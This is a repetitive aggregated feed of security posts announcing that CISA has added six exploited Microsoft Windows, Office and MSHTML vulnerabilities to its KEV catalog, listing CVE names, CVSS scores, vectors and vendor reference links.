CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21510
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21510
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21510
‼️ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##🔐 CVE-2026-21510
CVE-2026-21510
Protection mechanism failure in Windows Shell allows an unauthorized attacker to bypass a security feature over a network.
📊 CVSS Score: 8.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21510
🛡️ CWE: CWE-693
🔗 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21510
CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21510
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21510
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21510
‼️ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##updated 2026-02-10T21:51:48.077000
10 posts
🔐 CVE-2026-21513
CVE-2026-21513
Protection mechanism failure in MSHTML Framework allows an unauthorized attacker to bypass a security feature over a network.
📊 CVSS Score: 8.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21513
🛡️ CWE: CWE-693
🔗 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21513 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21513
🚨 [CISA-2026:0210] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0210)
CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2026-21510 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21510)
- Name: Microsoft Windows Shell Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21510
⚠️ CVE-2026-21513 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21513)
- Name: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2026-21513 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21513
⚠️ CVE-2026-21514 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21514)
- Name: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Office
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21514
⚠️ CVE-2026-21519 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21519)
- Name: Microsoft Windows Type Confusion Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21519
⚠️ CVE-2026-21525 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21525)
- Name: Microsoft Windows NULL Pointer Dereference Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21525
⚠️ CVE-2026-21533 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21533)
- Name: Microsoft Windows Improper Privilege Management Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21533
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260210 #cisa20260210 #cve_2026_21510 #cve_2026_21513 #cve_2026_21514 #cve_2026_21519 #cve_2026_21525 #cve_2026_21533 #cve202621510 #cve202621513 #cve202621514 #cve202621519 #cve202621525 #cve202621533
##CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21513
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2026-21513 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21513
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21513
‼️ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##🔐 CVE-2026-21513
CVE-2026-21513
Protection mechanism failure in MSHTML Framework allows an unauthorized attacker to bypass a security feature over a network.
📊 CVSS Score: 8.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21513
🛡️ CWE: CWE-693
🔗 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21513 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21513
CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21513
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2026-21513 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21513
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21513
‼️ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##updated 2026-02-10T21:51:48.077000
9 posts
🔐 CVE-2026-21514
CVE-2026-21514
Reliance on untrusted inputs in a security decision in Microsoft Office Word allows an unauthorized attacker to bypass a security feature locally.
📊 CVSS Score: 7.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21514
🛡️ CWE: CWE-807
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21514
🚨 [CISA-2026:0210] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0210)
CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2026-21510 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21510)
- Name: Microsoft Windows Shell Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21510
⚠️ CVE-2026-21513 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21513)
- Name: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2026-21513 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21513
⚠️ CVE-2026-21514 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21514)
- Name: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Office
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21514
⚠️ CVE-2026-21519 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21519)
- Name: Microsoft Windows Type Confusion Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21519
⚠️ CVE-2026-21525 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21525)
- Name: Microsoft Windows NULL Pointer Dereference Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21525
⚠️ CVE-2026-21533 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21533)
- Name: Microsoft Windows Improper Privilege Management Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21533
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260210 #cisa20260210 #cve_2026_21510 #cve_2026_21513 #cve_2026_21514 #cve_2026_21519 #cve_2026_21525 #cve_2026_21533 #cve202621510 #cve202621513 #cve202621514 #cve202621519 #cve202621525 #cve202621533
##CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21514
Vendor: Microsoft
Product: Office
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21514
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21514
‼️ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##🔐 CVE-2026-21514
CVE-2026-21514
Reliance on untrusted inputs in a security decision in Microsoft Office Word allows an unauthorized attacker to bypass a security feature locally.
📊 CVSS Score: 7.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21514
🛡️ CWE: CWE-807
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21514
CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21514
Vendor: Microsoft
Product: Office
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21514
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21514
‼️ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##updated 2026-02-10T21:51:48.077000
9 posts
🔐 CVE-2026-21519
CVE-2026-21519
Access of resource using incompatible type ('type confusion') in Desktop Window Manager allows an authorized attacker to elevate privileges locally.
📊 CVSS Score: 7.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21519
🛡️ CWE: CWE-843
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21519
🚨 [CISA-2026:0210] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0210)
CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2026-21510 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21510)
- Name: Microsoft Windows Shell Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21510
⚠️ CVE-2026-21513 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21513)
- Name: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2026-21513 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21513
⚠️ CVE-2026-21514 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21514)
- Name: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Office
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21514
⚠️ CVE-2026-21519 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21519)
- Name: Microsoft Windows Type Confusion Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21519
⚠️ CVE-2026-21525 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21525)
- Name: Microsoft Windows NULL Pointer Dereference Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21525
⚠️ CVE-2026-21533 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21533)
- Name: Microsoft Windows Improper Privilege Management Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
